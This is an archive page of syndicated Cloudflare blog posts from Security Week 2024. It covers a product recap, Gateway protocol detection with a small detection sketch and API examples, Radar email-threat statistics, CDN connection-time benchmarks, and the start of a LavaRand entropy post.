Tag Archives: Security Week

Security Week 2024 wrap up

Post Syndicated from Daniele Molteni original https://blog.cloudflare.com/security-week-2024-wrap-up


The next 12 months have the potential to reshape the global political landscape, with elections occurring in more than 80 nations in 2024, while new technologies, such as AI, capture our imagination and pose new security challenges.

Against this backdrop, the role of CISOs has never been more important. In the Security Week opening blog, Grant Bourzikas, Cloudflare’s Chief Security Officer, shared his views on the biggest challenges currently facing the security industry.

Over the past week, we announced a number of new products and features that align with what we believe are the most crucial challenges for CISOs around the globe. We released features that span Cloudflare’s product portfolio, ranging from application security to securing employees and cloud infrastructure. We have also published a few stories on how we take a Customer Zero approach to using Cloudflare services to manage security at Cloudflare.

We hope you find these stories interesting and are excited by the new Cloudflare products. In case you missed any of these announcements, here is a recap of Security Week:

Responding to opportunity and risk from AI

Cloudflare announces Firewall for AI
Cloudflare announced the development of Firewall for AI, a protection layer that can be deployed in front of Large Language Models (LLMs) to identify abuses and attacks.

Defensive AI: Cloudflare’s framework for defending against next-gen threats
Defensive AI is the framework Cloudflare uses when integrating intelligent systems into its solutions. Cloudflare’s AI models look at customer traffic patterns, providing that organization with a tailored defense strategy unique to their environment.

Cloudflare launches AI Assistant for Security Analytics
We released a natural language assistant as part of Security Analytics. Now it is easier than ever to get powerful insights about your applications by exploring log and security events using the new natural language query interface.

Dispelling the Generative AI fear: how Cloudflare secures inboxes against AI-enhanced phishing
Generative AI is being used by malicious actors to make phishing attacks much more convincing. Learn how Cloudflare’s email security systems are able to see past the deception using advanced machine learning models.

Maintaining visibility and control as applications and clouds change

Magic Cloud Networking simplifies security, connectivity, and management of public clouds
Introducing Magic Cloud Networking, a new set of capabilities to visualize and automate cloud networks to give our customers easy, secure, and seamless connection to public cloud environments.

Secure your unprotected assets with Security Center: quick view for CISOs
Security Center now includes new tools to address a common challenge: ensuring comprehensive deployment of Cloudflare products across your infrastructure. Gain precise insights into where and how to optimize your security posture.

Announcing two highly requested DLP enhancements: Optical Character Recognition (OCR) and Source Code Detections
Cloudflare One now supports Optical Character Recognition and detects source code as part of its Data Loss Prevention service. These two features make it easier for organizations to protect their sensitive data and reduce the risks of breaches.

Introducing behavior-based user risk scoring in Cloudflare One
We are introducing user risk scoring as part of Cloudflare One, a new set of capabilities to detect risk based on user behavior, so that you can improve security posture across your organization.

Eliminate VPN vulnerabilities with Cloudflare One
The Cybersecurity & Infrastructure Security Agency issued an Emergency Directive due to the Ivanti Connect Secure and Policy Secure vulnerabilities. In this post, we discuss the threat actor tactics exploiting these vulnerabilities and how Cloudflare One can mitigate these risks.

Zero Trust WARP: tunneling with a MASQUE
This blog discusses the introduction of MASQUE to Zero Trust WARP and how Cloudflare One customers will benefit from this modern protocol.

Collect all your cookies in one jar with Page Shield Cookie Monitor
Protecting online privacy starts with knowing what cookies are used by your websites. Our client-side security solution, Page Shield, extends transparent monitoring to HTTP cookies.

Protocol detection with Cloudflare Gateway
Cloudflare Secure Web Gateway now supports the detection, logging, and filtering of network protocols using packet payloads, without the need for inspection.

Introducing Requests for Information (RFIs) and Priority Intelligence Requirements (PIRs) for threat intelligence teams
Our Security Center now houses Requests for Information and Priority Intelligence Requirements. These features are available via the API as well, and Cloudforce One customers can start leveraging them today for enhanced security analysis.

Consolidating to drive down costs

Log Explorer: monitor security events without third-party storage
With the combined power of Security Analytics and Log Explorer, security teams can analyze, investigate, and monitor logs natively within Cloudflare, reducing time to resolution and overall cost of ownership by eliminating the need for third-party logging systems.

Simpler migration from Netskope and Zscaler to Cloudflare: introducing Deskope and a Descaler partner update
Cloudflare expands the Descaler program to Authorized Service Delivery Partners (ASDPs). Cloudflare is also launching Deskope, a new set of tooling to help migrate existing Netskope customers to Cloudflare One.

Protecting APIs with JWT Validation
Cloudflare customers can now protect their APIs from broken authentication attacks by validating incoming JSON Web Tokens with API Gateway.

Simplifying how enterprises connect to Cloudflare with Express Cloudflare Network Interconnect
Express Cloudflare Network Interconnect makes it fast and easy to connect your network to Cloudflare. Customers can now order Express CNIs directly from the Cloudflare dashboard.

Cloudflare treats SASE anxiety for VeloCloud customers
The turbulence in the SASE market is driving many customers to seek help. We’re doing our part to help VeloCloud customers who are caught in the crosshairs of shifting strategies.

Free network flow monitoring for all enterprise customers
Announcing a free version of Cloudflare’s network flow monitoring product, Magic Network Monitoring, now available to all Enterprise customers.

Building secure websites: a guide to Cloudflare Pages and Turnstile Plugin
Learn how to use Cloudflare Pages and Turnstile to deploy your website quickly and easily while protecting it from bots, without compromising user experience.

General availability for WAF Content Scanning for file malware protection
Announcing the General Availability of WAF Content Scanning, protecting your web applications and APIs from malware by scanning files in transit.

How can we help make the Internet better?

Cloudflare protects global democracy against threats from emerging technology during the 2024 voting season
At Cloudflare, we’re actively supporting a range of players in the election space by providing security, performance, and reliability tools to help facilitate the democratic process.

Navigating the maze of Magecart: a cautionary tale of a Magecart impacted website
Learn how a sophisticated Magecart attack was behind a campaign against e-commerce websites. This incident underscores the critical need for a strong client-side security posture.

Cloudflare’s URL Scanner, new features, and the story of how we built it
Discover the enhanced URL Scanner API, now integrated with the Security Center Investigate Portal. Enjoy unlisted scans, multi-device screenshots, and seamless integration with the Cloudflare ecosystem.

Changing the industry with CISA’s Secure by Design principles
Security considerations should be an integral part of software’s design, not an afterthought. Explore how Cloudflare adheres to the Cybersecurity & Infrastructure Security Agency’s Secure by Design principles to shift the industry.

The state of the post-quantum Internet
Nearly two percent of all TLS 1.3 connections established with Cloudflare are secured with post-quantum cryptography. In this blog post we discuss where we are now in early 2024, what to expect for the coming years, and what you can do today.

Advanced DNS Protection: mitigating sophisticated DNS DDoS attacks
Introducing the Advanced DNS Protection system, a robust defense mechanism designed to protect against the most sophisticated DNS-based DDoS attacks.

Sharing the Cloudflare way

Linux kernel security tunables everyone should consider adopting
This post illustrates some of the Linux kernel features that are helping Cloudflare keep its production systems more secure. We do a deep dive into how they work and why you should consider enabling them.

Securing Cloudflare with Cloudflare: a Zero Trust journey
A deep dive into how we have deployed Zero Trust at Cloudflare while maintaining user privacy.

Network performance update: Security Week 2024
Cloudflare is the fastest provider for 95th percentile connection time in 44% of networks around the world. We dig into the data and talk about how we do it.

Harnessing chaos in Cloudflare offices
This blog discusses the new sources of “chaos” that have been added to LavaRand and how you can make use of that harnessed chaos in your next application.

Launching email security insights on Cloudflare Radar
The new Email Security section on Cloudflare Radar provides insights into the latest trends around threats found in malicious email, sources of spam and malicious email, and the adoption of technologies designed to prevent abuse of email.

A final word

Thanks for joining us this week, and stay tuned for our next Innovation Week in early April, focused on the developer community.

Protocol detection with Cloudflare Gateway

Post Syndicated from Ankur Aggarwal original https://blog.cloudflare.com/gatway-protocol-detection


Cloudflare Gateway, our secure web gateway (SWG), now supports the detection, logging, and filtering of network protocols regardless of their source or destination port. Protocol detection makes it easier to set precise policies without having to rely on the well-known port and without the risk of over- or under-filtering activity that could disrupt your users’ work. For example, you can filter all SSH traffic on your network by simply choosing the protocol.

Today, protocol detection is available to any Enterprise user of Gateway and supports a growing list of protocols including HTTP, HTTPS, SSH, TLS, DCE/RPC, MQTT, and TPKT.

Why is this needed?

While many configuration planes have moved to RESTful APIs, and now even GraphQL, there is still a need to manage devices via protocols like SSH. Whether it is the only management protocol available on a new third-party device, or simply one of the first ways we learned to connect to and manage a server, SSH is still extensively used.

With other legacy SWG and firewall tools, blocking traffic by specifying only the well-known port number (for example, port 22 for SSH) can be both insecure and inconvenient. For example, if you used SSH over any other port it would not be filtered properly, and if you tried using another protocol over a well-known port, such as port 22, it would be blocked. An argument could also be made to lock down destinations to only allow incoming connections over certain ports, but companies often don’t control their destination devices.

With port-based approaches like these, there are risks of over-blocking legitimate traffic, which potentially prevents users from reaching the resources they need to stay productive and leads to a large volume of support tickets for your administrators. Alternatively, you could under-block and miss out on filtering your intended traffic, creating security risks for your organization.

How we built it

To build a performant protocol detection and filtering capability, we had to make sure it could be applied in the same place Gateway policies are applied. To meet this requirement, we added a new TCP socket pre-read hook to OXY, our Rust-based policy framework, to buffer the first few bytes of the data stream. This buffer then allows Gateway to compare the bytes to our protocol signature database and apply the correct next step. And since this is all built into OXY, if the policy is set to Block, the connection will be closed; if it’s set to Allow, the connection will be proxied or progressed to establish the TLS session.
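To make this concrete, here is a minimal TypeScript sketch of what signature-based detection over those first buffered bytes can look like. It is an illustration rather than OXY’s actual implementation, using two well-known fingerprints: SSH connections open with an “SSH-” banner, and a TLS handshake record starts with the byte 0x16.

// A minimal sketch of signature-based protocol detection over a hypothetical
// pre-read buffer holding the first bytes of a TCP stream. Real fingerprints
// are more involved; these are illustrative.
function detectProtocol(preRead: Uint8Array): "ssh" | "tls" | "http" | "unknown" {
  const ascii = new TextDecoder().decode(preRead.slice(0, 8));
  if (ascii.startsWith("SSH-")) return "ssh"; // SSH banner, e.g. "SSH-2.0-..."
  if (preRead[0] === 0x16 && preRead[1] === 0x03) return "tls"; // TLS handshake record
  if (/^(GET|POST|PUT|HEAD) /.test(ascii)) return "http"; // plaintext HTTP methods
  return "unknown";
}

// The policy decision then keys off the detected protocol, not the port:
// if (detectProtocol(buffer) === "ssh" && policyAction === "block") close the connection.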

How to set up Gateway protocol filtering

Cloudflare Gateway’s protocol detection simplifies this process by allowing you to specify the protocol within a Gateway network policy. To get started, navigate to the Settings section of the Zero Trust dashboard and select the Network tile. Under the Firewall section you’ll see a toggle for protocol detection; once enabled, you’ll be able to create network policies.

Next, go to the Firewall Policies section of your Zero Trust Gateway dashboard and click ‘+ Add a policy’. There you can create a policy, such as the one sketched below, to block SSH for all users within the Sales department.
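If you manage policies through the API, a sketch like the following could create an equivalent rule using the Gateway rules endpoint. The net.protocol selector and the identity expression shown here are illustrative assumptions; consult the Gateway API reference for the exact field values.

// Hedged sketch: create a Gateway network policy that blocks detected SSH
// for the Sales department via the API. The selector name ("net.protocol")
// and the identity expression are illustrative assumptions.
const API_TOKEN = "<your API token>";
const ACCOUNT_ID = "<your account ID>";

const resp = await fetch(
  `https://api.cloudflare.com/client/v4/accounts/${ACCOUNT_ID}/gateway/rules`,
  {
    method: "POST",
    headers: {
      Authorization: `Bearer ${API_TOKEN}`,
      "Content-Type": "application/json",
    },
    body: JSON.stringify({
      name: "Block SSH for Sales",
      action: "block",
      enabled: true,
      filters: ["l4"], // network-layer policy
      traffic: 'net.protocol == "ssh"', // match on detected protocol, not port
      identity: 'identity.groups.name[*] == "Sales"', // illustrative group match
    }),
  },
);
console.log(await resp.json());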

This will prevent members of the sales team from initiating an outgoing or incoming SSH session.

Get started

Customers with a Cloudflare One Enterprise account will find this functionality in their Gateway dashboard today. We plan to make it available to Pay-as-you-go and Free customer accounts soon, and to expand the list of supported protocols.

If you’re interested in using protocol detection or ready to explore more broadly how Cloudflare can help you modernize your security, request a workshop or contact your account manager.

Launching email security insights on Cloudflare Radar

Post Syndicated from David Belson original https://blog.cloudflare.com/email-security-insights-on-cloudflare-radar


During 2021’s Birthday Week, we announced our Email Routing service, which allows users to direct different types of email messages (such as marketing, transactional, or administrative) to separate accounts based on criteria such as the recipient’s address or department. Its capabilities and the volume of messages routed have grown significantly since launch.

Just a few months later, on February 23, 2022, we announced our intent to acquire Area 1 Security to protect users from phishing attacks in email, web, and network environments. Since the completion of the acquisition on April 1, 2022, Area 1’s email security capabilities have been integrated into Cloudflare’s secure access service edge (SASE) solution portfolio, and the service now processes tens of millions of messages daily.

Processing millions of email messages each day on behalf of our customers gives us a unique perspective on the threats posed by malicious emails, spam volume, the adoption of email authentication methods like SPF, DMARC, and DKIM, and the use of IPv4/IPv6 and TLS by email servers. Today, we are launching a new Email Security section on Cloudflare Radar to share these perspectives with you. The insights in this new section can help you better understand the state of email security as viewed across various metrics, as well as understand real-time trends in email-borne threats. (For instance, you could correlate an observed increase within your organization in messages containing malicious links with a similar increase observed by Cloudflare.) Below, we review the new metrics that are now available on Radar.

Tracking malicious email

As Cloudflare’s email security service processes email messages on behalf of customers, we are able to identify and classify offending messages as malicious. As examples, malicious emails may attempt to trick recipients into sharing personal information like login details, or the messages could attempt to spread malware through embedded images, links, or attachments. The new Email Security section on Cloudflare Radar now provides insight at a global level into the aggregate share of processed messages that we have classified as malicious over the selected timeframe. During February 2024, as shown in the figure below, we found that an average of 2.1% of messages were classified as malicious. Spikes in malicious email volume were seen on February 10 and 11, accounting for as much as 29% of messages. These spikes occurred just ahead of the Super Bowl, in line with previous observations of increases in malicious email volume in the week ahead of the game. Other notable (but lower) spikes were seen on February 13, 15, 17, 24, and 25. The summary and time series data for malicious email share are available through the Radar API.
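If you would like to pull these numbers programmatically, a sketch like the following fetches the malicious email share. The route shown is our reading of the Radar API’s email security summary endpoint, so treat the exact path and parameters as assumptions.

// Hedged sketch: query the share of email classified as malicious from the
// Cloudflare Radar API. Path and parameter names are assumptions based on
// Radar's documented URL structure; an API token is required.
const API_TOKEN = "<your API token>";
const params = new URLSearchParams({ dateStart: "2024-02-01", dateEnd: "2024-02-29" });

const res = await fetch(
  `https://api.cloudflare.com/client/v4/radar/email/security/summary/malicious?${params}`,
  { headers: { Authorization: `Bearer ${API_TOKEN}` } },
);
const { result } = await res.json();
console.log(result); // e.g. shares of MALICIOUS vs NOT_MALICIOUS messages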

Threat categorization

The Cloudflare Radar 2023 Year in Review highlighted some of the techniques used by attackers when carrying out attacks using malicious email messages. As noted above, these can include links or attachments leading to malware, as well as approaches like identity deception, where the message appears to be coming from a trusted contact, and brand impersonation, where the message appears to be coming from a trusted brand. In analyzing malicious email messages, Cloudflare’s email security service categorizes the threats it finds in these messages. (Note that a single message can contain multiple types of threats — the sender could be impersonating a trusted contact while the body of the email contains a link leading to a fake login page.)

Based on these assessments, Cloudflare Radar now provides insights into trends observed across several different groups of threat types including “Attachment”, “Link”, “Impersonation”, and “Other”. “Attachment” groups individual threat types where the attacker has attached a file to the email message, “Link” groups individual threat types where the attacker is trying to get the user to click on something, and “Impersonation” groups individual threat types where the attacker is impersonating a trusted brand or contact. The “Other” grouping includes other threat types not covered by the previous three.

During February 2024 for the “Link” grouping, as the figure below illustrates, link-based threats were unsurprisingly the most common, and were found in 58% of malicious emails. Since the display text for a link (i.e., hypertext) in HTML can be arbitrarily set, attackers can make a URL appear as if it links to a benign site when, in fact, it is actually malicious. Nearly a third of malicious emails linked to something designed to harvest user credentials. The summary and time series data for these threat categories are available through the Radar API.

For the “Attachment” grouping, during February 2024, nearly 13% of messages were found to have a malicious attachment that, when opened or executed in the context of an attack, includes a call to action (e.g., luring the target to click a link) or performs a series of actions set by an attacker. The share spiked several times throughout the month, reaching as high as 70%. The attachments in nearly 6% of messages attempted to download additional software (presumably malware) once opened.

If an email message appears to be coming from a trusted brand, users may be more likely to open it and take action, like checking the shipping status of a package or reviewing a financial transaction. During February 2024, on average, over a quarter of malicious emails were sent by attackers attempting to impersonate well-known brands. Similar to other threat categories, this one also saw a number of significant spikes, reaching as high as 88% on February 17. Just over 18% of messages were found to be trying to extort users in some fashion. It appears that such campaigns were very active in the week ahead of Valentine’s Day (February 14), although the peak was seen on February 15, at over 95% of messages.

Identity deception occurs when an attacker or someone with malicious intent sends an email claiming to be someone else, whether through use of a similar-looking domain or display name manipulation. This was the top threat category for the “Other” grouping, seen in over 36% of malicious emails during February 2024. The figure below shows three apparent “waves” of the use of this technique — the first began at the start of the month, the second around February 9, and the third around February 20. Over 11% of messages were categorized as malicious because of the reputation of the network (autonomous system) that they were sent from; some network providers are well-known sources of malicious and unwanted email.

Dangerous domains

Top-level domains, also known as TLDs, are found in the right-most portion of a hostname. For example, radar.cloudflare.com is in the .com generic Top Level Domain (gTLD), while bbc.co.uk is in the .uk country code Top Level Domain (ccTLD). As of February 2024, there are nearly 1600 Top Level Domains listed in the IANA Root Zone Database. Over the last 15 years or so, several reports have been published that look at the “most dangerous TLDs” — that is, which TLDs are most favored by threat actors. The “top” TLDs in these reports are often a mix of ccTLDs from smaller countries and newer gTLDs. On Radar, we are now sharing our own perspective on these dangerous TLDs, highlighting those where we have observed the largest shares of malicious and spam emails. The analysis is based on the sending domain’s TLD, found in the From: header of an email message. For example, if a message came from user@example.com, then example.com is the sending domain, and .com is the associated TLD.

On Radar, users can view shares of spam and malicious email, and can also filter by timeframe and “type” of TLD, with options to view all (the complete list), ccTLDs (country codes), or “classic” TLDs (the original set of gTLDs specified in RFC 1591). Note that spam percentages shown here may be lower than those published in other industry analyses. Cloudflare cloud email security customers may be performing initial spam filtering before messages arrive at Cloudflare for processing, resulting in a lower percentage of messages characterized as spam by Cloudflare.

Looking back across February 2024, we found that the new gTLD .associates and the ccTLD .zw (Zimbabwe) were the TLDs with domains originating the largest shares of malicious email, at over 85% each. The new gTLDs .academy, .directory, and .bar had the largest shares of spam in email sent by associated domains, at upwards of 95%.

TLDs with the highest percentage of malicious email in February 2024
TLDs with the highest percentage of spam email in February 2024

The figure below breaks out ccTLDs, where we found that at least half of the messages coming from domains in .zw (Zimbabwe, at 85%) and .bd (Bangladesh, at 50%) were classified as malicious. While the share of malicious email vastly outweighed the share of spam seen from .zw domains, it was much more balanced in .bd and .pw (Palau). A total of 80 ccTLDs saw fewer than 1% of messages classified as malicious in February 2024.

ccTLDs with the highest percentage of malicious email in February 2024

Among the “classic” TLDs, we can see that the shares of both malicious email and spam are relatively low. Perhaps unsurprisingly, as the largest TLD, .com has the largest shares of both in February 2024. Given the restrictions around registering .int and .gov domains, it is interesting to see that even 2% of the messages from associated domains are classified as malicious.

Classic TLDs with the highest percentage of malicious email in February 2024.

The reasons that some TLDs are responsible for a greater share of malicious and/or spam email vary — some may have loose or non-existent registration requirements, some may be more friendly to so-called “domain tasting”, and some may have particularly low domain registration fees. The malicious and spam summary shares per TLD are available through the Radar API.

Adoption of email authentication methods

SPF, DKIM, and DMARC are three email authentication methods; when used together, they help prevent spammers, phishers, and other unauthorized parties from sending emails on behalf of a domain they do not own.

Sender Policy Framework (SPF) is a way for a domain to list all the servers they send emails from, with SPF records in the DNS listing the IP addresses of all the servers that are allowed to send emails from the domain. Mail servers that receive an email message can check it against the SPF record before passing it on to the recipient’s inbox. DomainKeys Identified Mail (DKIM) enables domain owners to automatically “sign” emails from their domain with a digital “signature” that uses cryptography to mathematically verify that the email came from the domain. Domain-based Message Authentication Reporting and Conformance (DMARC) tells a receiving email server what to do, given the results after checking SPF and DKIM. A domain’s DMARC policy, stored in DMARC records, can be set in a variety of ways, instructing mail servers to quarantine emails that fail SPF or DKIM (or both), to reject such emails, or to deliver them.
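As a concrete illustration, here is roughly what these three records can look like in DNS for a hypothetical example.com (all values are illustrative, and the DKIM public key is truncated):

; SPF: which servers may send mail for example.com
example.com.                      IN TXT "v=spf1 ip4:203.0.113.0/24 include:_spf.mail-provider.example -all"

; DKIM: public key used to verify signatures, published under a selector
selector1._domainkey.example.com. IN TXT "v=DKIM1; k=rsa; p=MIIBIjANBgkqh..."

; DMARC: what receivers should do with mail that fails SPF/DKIM
_dmarc.example.com.               IN TXT "v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@example.com"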

These authentication methods have recently taken on increased importance, as both Google and Yahoo! have announced that during the first quarter of 2024, as part of a more aggressive effort to reduce spam, they will require bulk senders to follow best practices that include implementing stronger email authentication using standards like SPF, DKIM, and DMARC. When a given email message is evaluated against these three methods, the potential outcomes are PASS, FAIL, and NONE. The first two are self-explanatory, while NONE means that there was no SPF/DKIM/DMARC policy associated with the message’s sending domain.

Reviewing the average shares across February 2024, we find that over 93% of messages passed SPF authentication, while just 2.7% failed. When considering this metric, FAIL is the outcome of greater interest because SPF is easier to spoof than DKIM, and also because failure may be driven by “shadow IT” situations, such as when a company’s Marketing department uses a third party to send email on behalf of the company, but fails to add that third party to the associated SPF records. An average of 88.5% of messages passed DKIM evaluation in February, while just 2.1% failed. For DKIM, the focus should be on PASS, as there are potential non-malicious reasons that a given signature may fail to verify. For DMARC, 86.5% of messages passed authentication, while 4.2% failed, and the combination of PASS and FAIL is the focus, as the presence of an associated policy is of greatest interest for this metric, and whether the message passed or failed less so. For all three methods in this section, NONE indicates the lack of an associated policy. SPF (summary, time series), DKIM (summary, time series), and DMARC (summary, time series) data is available through the Radar API.

Protocol usage

Cloudflare has long evangelized IPv6 adoption, although it has largely been focused on making Web resources available via this not-so-new version of the protocol. However, it’s also important that other Internet services begin to support and use IPv6, and this is an area where our recent research shows that providers may be lacking.

Through analysis of inbound connections from senders’ mail servers to Cloudflare’s email servers, we can gain insight into the distribution of these connections across IPv4 and IPv6. Looking at this distribution for February 2024, we find that 95% of connections were made over IPv4, while only 5% used IPv6. This distribution is in sharp contrast to the share of IPv6 requests for IPv6-capable (dual stacked) Web content, which was 37% for the same time period. The summary and time series data for IPv4/v6 distribution are available through the Radar API.

Cloudflare has also been a long-time advocate for secure connections, launching Universal SSL during 2014’s Birthday Week, to enable secure connections between end users and Cloudflare for all of our customers’ sites (which numbered ~2 million at the time). Over the last 10 years, SSL has completed its evolution to TLS, and although many think of TLS as only being relevant for Web content, possibly due to years of being told to look for the 🔒 padlock in our browser’s address bar, TLS is also used to encrypt client/server connections across other protocols including SMTP (email), FTP (file transfer), and XMPP (messaging).

Similar to the IPv4/v6 analysis discussed above, we can also calculate the share of inbound connections to Cloudflare’s email servers that are using TLS. Messages are encrypted in transit when the connection is made over TLS, while messages sent over unencrypted connections can potentially be read or modified in transit. Fortunately, the vast majority of messages received by Cloudflare’s email servers are made over encrypted connections, with just 6% sent unencrypted during February 2024. The summary and time series data for TLS usage are available through the Radar API.

Conclusion

Although younger Internet users may eschew email in favor of communicating through a variety of messaging apps, email remains an absolutely essential Internet service, relied on by individuals, enterprises, online and offline retailers, governments, and more. However, because email is so ubiquitous, important, and inexpensive, it has also become an attractive threat vector. Cloudflare’s email routing and security services help customers manage and secure their email, and Cloudflare Radar’s new Email Security section can help security researchers, email administrators, and other interested parties understand the latest trends around threats found in malicious email, sources of spam and malicious email, and the adoption of technologies designed to prevent abuse of email.

If you have any questions about this new section, you can contact the Cloudflare Radar team at radar@cloudflare.com or on social media at @CloudflareRadar (X/Twitter), cloudflare.social/@radar (Mastodon), and radar.cloudflare.com (Bluesky).

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Network performance update: Security Week 2024

Post Syndicated from David Tuber original https://blog.cloudflare.com/network-performance-update-security-week-2024


We constantly measure our own network’s performance against other networks, look for ways to improve it, and share the results of our efforts. Since June 2021, we’ve been publishing the benchmarking results we’ve run against other networks to see how we compare.

In this post we are going to share the most recent updates since our last post in September, and talk about how we are getting as fast as we are.

How we stack up

Since June 2021, we’ve been taking a close look at the most-reported eyeball-facing ISPs and taking action on the specific networks where we have room for improvement. Cloudflare is now the fastest provider for TCP Connection time at the 95th percentile in 44% of networks around the world (we define a network as a country and AS number pair). We chose this metric to show how our network helps make your websites faster by getting you to where your customers are. Looking back at the numbers, in July 2022 Cloudflare ranked #1 in 33% of networks and was within 2 ms (95th percentile TCP Connection Time) or 5% of the #1 provider for 8% of the networks that we measured. For reference, our closest competitor was the fastest for 20% of networks.

As of August 30, 2023, Cloudflare was the fastest provider for 44% of networks, and was within 2 ms (95th percentile TCP Connection Time) or 5% of the fastest provider for 10% of the networks that we measured, whereas our closest competitor (Amazon CloudFront) was the fastest for 19% of networks. As of February 15, 2024, we are still #1 in 44% of networks for 95th percentile TCP Connection Time. Let’s dig into the data.

Lightning fast

Looking at 95th percentile TCP connect times from November 18, 2023, to February 15, 2024, Cloudflare is the #1 provider in 44% of the top 1000 networks:

Our P95 TCP Connection time has been trending down since November, and we are consistently 50 ms faster at P95 than our closest competitor (Amazon CloudFront):

Connect time comparisons between providers at 50th and 95th percentile:

Provider      P50 Connect (ms)    P95 Connect (ms)
Cloudflare    130                 579
Amazon        145                 637
Google        190                 772
Akamai        195                 774
Fastly        189                 734

These graphs show that day over day, Cloudflare was consistently the fastest provider. They also show the gaps between Cloudflare and the other competitors. When you look at the 95th percentile, Cloudflare is almost 200 ms faster than Akamai across the world for connect times. This shows that our network reaches more places and allows users to get their content faster than Akamai on a consistent basis.

When we aggregate this data over the whole time period, Cloudflare is the fastest in the most networks. For that whole time span of November 18, 2023, to February 15, 2024, Cloudflare was number 1 in 73% of networks for mean TCP connection time:

Looking at a map plotting by 95th percentile TCP connect time, Cloudflare is the fastest in the most countries, and you can see this by the fact that most of the map is orange:

For comparison, here’s what the map looked like in September 2023:

These numbers show that we’re reducing the overall TCP connection time around the world while simultaneously staying ahead of the competition. Let’s talk about how we get these numbers and what we’re doing to make you even faster.

Measuring What Matters

As a quick reminder, here’s how we get the data for our measurements: when users receive a Cloudflare-branded error page, we use Real User Measurements (RUM) and fetch a small file from Cloudflare, Akamai, Amazon CloudFront, Fastly, and Google Cloud CDN. Browsers around the world report the performance of those providers from the perspective of the end-user network they are on. The goal is to provide an accurate picture of where different providers are faster, and more importantly, where Cloudflare can improve. You can read more about the methodology in the original Speed Week blog post.

Using the RUM data, we measure various performance metrics, such as TCP Connection Time, Time to First Byte (TTFB), and Time to Last Byte (TTLB), for ourselves and other providers.
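As a rough illustration of how these metrics can be derived in a browser (this is not our exact RUM implementation), the standard Resource Timing API exposes the underlying timestamps for a fetched file:

// Sketch: derive connect time, TTFB, and TTLB for a fetched resource using
// the browser's standard Resource Timing API. This illustrates the metrics
// themselves, not Cloudflare's actual measurement code. Note that cross-origin
// endpoints must send a Timing-Allow-Origin header for these fields to be populated.
const url = "https://example.com/small-file.bin"; // illustrative test object
await fetch(url);

const [entry] = performance.getEntriesByName(url) as PerformanceResourceTiming[];
const tcpConnect = entry.connectEnd - entry.connectStart; // TCP connection time
const ttfb = entry.responseStart - entry.startTime;       // time to first byte
const ttlb = entry.responseEnd - entry.startTime;         // time to last byte
console.log({ tcpConnect, ttfb, ttlb });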

Since we only collect data from a browser when we return an error page, the data can be quite variable: if one network or website is having a problem in a certain country, that country could overreport, meaning those networks would be more heavily weighted in the calculations because more users reported from that network during a given time period.

For example, if a lot of users connecting over a small Brazilian network were generating reports because their websites were throwing errors more frequently, that could make this small network look a lot bigger to us. This small network in Brazil could have as many reports as Claro, a major network in the region, despite the two being totally different in their number of subscribers. If we only look at the networks that report to us the most, smaller networks with fewer subscribers could be treated as more important because of point-in-time error conditions.

This phenomenon could cause the networks we look at to change week over week. Going back to the Brazil example, if the website that was throwing a bunch of errors fixed their problem, and we no longer saw measurements from that network, they may not show up as a “most reported network” depending on when we look at the data. This means that the networks we look at to consider where we are fastest are dependent on which networks are sending us the most reports at any given time, which is not optimal if we’re trying to get faster in these networks. We need to be able to get a consistent signal on these networks to understand where we’re faster and where we’re not.

We’ve addressed this issue by creating a fixed list of the networks we want to look at. We did this by looking at public stats on user population by network and then comparing that with our sample sizes by network until we identified the 1000 networks we want to examine.  This ensures that day over day, the networks we look at are the same.

Now let’s talk about what makes us faster in more places than other networks: HTTP/3.

Blazing fast speeds with HTTP/3

One reason why Cloudflare is the fastest in the most networks is that we’ve been leading the charge on adoption and usage of HTTP/3 on our platform. HTTP/3 allows for faster connection setup, which means we can get connections established faster and data flowing sooner. HTTP/3 is currently used by around 31% of Internet traffic:

To show that HTTP/3 improves connection times, we looked at two different Cloudflare endpoints that these tests ran against: one with HTTP/3 enabled and one with HTTP/3 disabled. The performance difference between the two is night and day. Here’s a table comparing 50th and 95th percentile connect times between Cloudflare zones when one zone has HTTP/3 enabled:

Zone                      P50 connect (ms)    P95 connect (ms)
Cloudflare HTTP/3         130                 579
Cloudflare non-HTTP/3     174                 695

At P95, Cloudflare is 116 ms faster for connection times when HTTP/3 is enabled. This performance gain helps us be the fastest in the most networks.

But why does HTTP/3 help make us faster? HTTP/3 allows for faster connection setup times, which lets us take greater advantage of our global network footprint to be the fastest in the most networks. HTTP/3 is built on top of the QUIC protocol, which runs over UDP and multiplexes parallel streams within a single connection. Because QUIC combines the transport and TLS handshakes, a secure connection can be established in fewer round trips, shortening the amount of time needed to set it up. Paired with Cloudflare’s network that is incredibly close to end users, this makes for significant latency reductions in user connect times. All major browsers have HTTP/3 enabled by default, so you too can realize these latency improvements by enabling HTTP/3 on your website today.
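If your zone is on Cloudflare, HTTP/3 can be toggled as a zone setting. Here is a hedged sketch using the zone settings API; the http3 setting ID reflects our understanding of that API:

// Hedged sketch: enable HTTP/3 for a zone via the zone settings API. The
// "http3" setting ID reflects our understanding of the settings API.
const API_TOKEN = "<your API token>";
const ZONE_ID = "<your zone ID>";

const res = await fetch(
  `https://api.cloudflare.com/client/v4/zones/${ZONE_ID}/settings/http3`,
  {
    method: "PATCH",
    headers: {
      Authorization: `Bearer ${API_TOKEN}`,
      "Content-Type": "application/json",
    },
    body: JSON.stringify({ value: "on" }),
  },
);
console.log(await res.json());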

What’s next

We’re sharing our updates on our journey to become #1 everywhere so that you can see what goes into running the fastest network in the world. From here, our plan is the same as always: identify where we’re slower, fix it, and then tell you how we’ve gotten faster.

Harnessing chaos in Cloudflare offices

Post Syndicated from Cefan Daniel Rubin original https://blog.cloudflare.com/harnessing-office-chaos


In the children’s book The Snail and the Whale, after an unexpectedly far-flung adventure, the principal character returns to declarations of “How time’s flown” and “Haven’t you grown?” It has been about four years since we last wrote about LavaRand, and during that time the story of how Cloudflare uses physical sources of entropy to add to the security of the Internet has continued to travel and be a source of interest to many. What was initially just a single species of physical entropy source (lava lamps) has grown and diversified. We want to catch you up a little on the story of LavaRand. This blog post will cover the new sources of “chaos” that have been added to LavaRand and how you can make use of that harnessed chaos in your next application. We’ll cover how public randomness can open up uses of publicly trusted randomness: imagine not needing to take the holders of a “random draw” at their word when they claim the outcome is not manipulated in some way. And finally, we’ll discuss timelock encryption, which is a way to ensure that a message cannot be decrypted until some chosen time in the future.

LavaRand origins

The entropy sourced from our wall of lava lamps in San Francisco has long played its part in the randomness that secures connections made through Cloudflare.

Lava lamps with flowing wax.

